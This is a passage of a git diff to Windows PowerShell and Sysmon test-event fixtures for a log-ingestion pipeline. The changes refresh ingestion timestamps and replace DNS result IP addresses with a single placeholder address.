IABpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAAdgBhAHIAaQBhAGIAbABlADoAZwBsAG8AYgBhAGwAOgBQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQApAHsAcwBlAHQALQB2AGEAcgBpAGEAYgBsAGUAIAAtAG4AYQBtAGUAIAB2AGEAcgBpAGEAYgBsAGUAOgBnAGwAbwBiAGEAbAA6AFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAALQB2AGEAbAB1AGUAIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwB9ADsALgAgAGMAOgAvAFcAaQBuAGQAbwB3AHMALwBUAGUAbQBwAC8AcABhAGMAawBlAHIALQBwAHMALQBlAG4AdgAtAHYAYQByAHMALQA1AGUANQA2ADMANwBkAGQALQAxADUAYQA5AC0ANwAzAGUAMAAtADgAOAA5AGEALQBjADAAMQBmADUANAAxAGEAOABiAGMANgAuAHAAcwAxADsAIAAmACcAYwA6AC8AVwBpAG4AZABvAHcAcwAvAFQAZQBtAHAALwBzAGMAcgBpAHAAdAAtADUAZQA1ADYAMwA3AGQAZAAtADUANgAyADYALQAwADEAOQBkAC0AMAAyADcAYQAtADAAMgBlADcAOABiAGEAYQBhAGMAYwA5AC4AcABzADEAJwA7ACAAZQB4AGkAdAAgACQATABhAHMAdABFAHgAaQB0AEMAbwBkAGUAIAA= -inputFormat xml -outputFormat text\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=8228a4bd-3125-4d1a-997b-3a4df8c085f2\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e403\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-06-04T07:20:28.686193900Z'/\u003e\u003cEventRecordID\u003e18592\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eStopped\u003c/Data\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=10\n\n\tHostName=ConsoleHost\n\tHostVersion=2.0\n\tHostId=7018c049-c75b-4e02-9c0f-6761b97e1657\n\tEngineVersion=2.0\n\tRunspaceId=6ebeca05-d618-4c66-a0d8-4269d800d099\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "PowerShell", diff --git a/packages/windows/data_stream/powershell_operational/_dev/test/pipeline/test-events.json-expected.json b/packages/windows/data_stream/powershell_operational/_dev/test/pipeline/test-events.json-expected.json index 317024751d8..ab35590698f 100644 --- a/packages/windows/data_stream/powershell_operational/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/windows/data_stream/powershell_operational/_dev/test/pipeline/test-events.json-expected.json @@ -37,7 +37,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:23:14.352106200Z", + "ingested": "2021-12-09T13:50:22.931472300Z", "code": "4105", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4105\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e102\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T09:04:04.755232500Z'/\u003e\u003cEventRecordID\u003e790\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{dd68516a-2930-0000-5962-68dd3029d601}'/\u003e\u003cExecution ProcessID='4204' ThreadID='1476'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003ef4a378ab-b74f-41a7-a5ef-6dd55562fdb9\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e9c031e5c-8d5a-4b91-a12e-b3624970b623\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -148,7 +148,7 @@ }, "event": { "sequence": 34, - "ingested": "2021-06-14T13:23:14.352142600Z", + "ingested": "2021-12-09T13:50:22.931480800Z", "code": "4103", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:11:47.897949500Z'/\u003e\u003cEventRecordID\u003e3885\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0002-c208-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='3984' ThreadID='3616'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = ed57761b-ba0f-4d11-87d9-fac33820d20e\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.17763.1007\n Runspace ID = 0729459a-8646-4176-8b02-024421a9632e\n Pipeline ID = 1\n Command Name = cmd.exe\n Command Type = Application\n Script Name =\n Command Path = C:\\Windows\\system32\\cmd.exe\n Sequence Number = 34\n User = VAGRANT\\vagrant\n Connected User = VAGRANT\\vagrant\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(cmd.exe): \"cmd.exe\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"symbolic link created for C:\\vagrant \u0026lt;\u0026lt;===\u0026gt;\u0026gt; \\\\vboxsvr\\vagrant\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:13:06.703293900Z'/\u003e\u003cEventRecordID\u003e3917\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0003-db0b-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='5032' ThreadID='4160'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.17763.1007\n Host ID = aae5217d-054f-435f-9968-4b5bebf12116\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n Engine Version = 5.1.17763.1007\n Runspace ID = a87e8389-57c7-4997-95ff-f82f644965bf\n Pipeline ID = 9\n Command Name = Resolve-Path\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 22\n User = VAGRANT\\vagrant\n Connected User =\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"WarningAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"InformationAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"Verbose\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Debug\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Gopath\\src\\github.com\\elastic\\beats\\x*\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -199,7 +199,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:23:14.352153200Z", + "ingested": "2021-12-09T13:50:22.931486800Z", "code": "4106", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4106\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e103\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T10:40:32.595715200Z'/\u003e\u003cEventRecordID\u003e933\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{e3200b8a-290e-0002-332a-20e30e29d601}'/\u003e\u003cExecution ProcessID='4776' ThreadID='5092'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003e4c487c13-46f7-4485-925b-34855c7e873c\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e3f1a9181-0523-4645-a42c-2c1868c39332\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -253,7 +253,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:23:14.352162600Z", + "ingested": "2021-12-09T13:50:22.931492Z", "code": "4104", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.389266200Z'/\u003e\u003cEventRecordID\u003e3580\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0001-18e0-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e.\\patata.ps1\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003e50d2dbda-7361-4926-a94d-d9eadfdb43fa\u003c/Data\u003e\u003cData Name='Path'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.393884800Z'/\u003e\u003cEventRecordID\u003e3582\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0000-79db-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003ef5521cbd-656e-4296-b74d-9ffb4eec23b0\u003c/Data\u003e\u003cData Name='Path'\u003eC:\\Users\\vagrant\\Desktop\\patata.ps1\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", diff --git a/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json b/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json index 38fa8984939..b4bd0afd978 100644 --- a/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json +++ b/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json @@ -15,7 +15,7 @@ "ProcessId": "356", "QueryName": "go.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;", + "QueryResults": "type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "provider_name": "Microsoft-Windows-Sysmon", @@ -33,7 +33,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -58,7 +58,7 @@ "event_data": { "QueryName": "www.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;", + "QueryResults": "type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.261", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -73,7 +73,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -123,7 +123,7 @@ { "@timestamp": "2021-05-05T15:30:51.692Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -155,7 +155,7 @@ "ProcessId": "2736", "QueryName": "static-global-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;" + "QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;" } } }, @@ -168,7 +168,7 @@ "ProcessId": "356", "QueryName": "www.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;", + "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "process": { @@ -194,7 +194,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 